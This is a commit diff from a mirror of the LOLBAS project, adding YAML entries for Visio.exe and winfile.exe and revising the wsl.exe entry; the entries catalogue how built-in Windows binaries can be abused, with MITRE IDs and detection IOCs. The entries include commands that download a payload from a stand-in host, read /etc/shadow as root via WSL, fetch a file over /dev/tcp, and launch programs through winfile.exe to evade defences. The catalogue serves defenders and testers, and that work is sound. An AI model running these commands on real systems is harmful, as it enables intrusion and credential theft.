public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-09-21 15:40:30 +02:00
Code Issues Projects Releases Wiki Activity

Merge branch 'LOLBAS-Project:master' into XBootMgrSleep

Browse Source
This commit is contained in:
Avihay Eldad
2024-06-13 11:05:12 +03:00
committed by GitHub
parent 49b9544a79 03b527b105
commit 4fc93f5e5b
7 changed files with 115 additions and 28 deletions
Download Patch File Download Diff File Expand all files Collapse all files

34
yml/OtherMSBinaries/Visio.yml Normal file
View File

@@ -0,0 +1,34 @@
---
Name: Visio.exe
Description: Microsoft Visio Executable
Author: Avihay Eldad
Created: 2024-02-15
Commands:
- Command: Visio.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office14\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office15\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe
- Path: C:\Program Files\Microsoft Office\Office16\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe
- Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe
Detection:
- IOC: URL on a visio.exe command line
- IOC: visio.exe making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'

22
yml/OtherMSBinaries/Wsl.yml
View File

@@ -10,35 +10,28 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe -u root -e cat /etc/shadow
Description: Cats /etc/shadow file as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --exec bash -c 'cat file'
Description: Cats /etc/shadow file as root
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe --exec bash -c "<command>"
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Usecase: Performs execution of arbitrary Linux commands.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --system calc.exe
Description: Execute the command as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 11
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
MitreID: T1105
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Full_Path:
- Path: C:\Windows\System32\wsl.exe
Code_Sample:
@@ -59,3 +52,4 @@ Acknowledgement:
Handle: '@d1r4c'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'
- Person: Konrad 'unrooted' Klawikowski

24
yml/OtherMSBinaries/winfile.yml Normal file
View File

@@ -0,0 +1,24 @@
---
Name: winfile.exe
Description: Windows File Manager executable
Author: Avihay Eldad
Created: 2024-04-30
Commands:
- Command: winfile.exe calc.exe
Description: Execute an executable file with WinFile as a parent process.
Usecase: Performs execution of specified file, can be used as a defense evasion
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\winfile.exe
- Path: C:\Windows\winfile.exe
- Path: C:\Program Files\WinFile\winfile.exe
- Path: C:\Program Files (x86)\WinFile\winfile.exe
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe
Resources:
- Link: https://github.com/microsoft/winfile
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'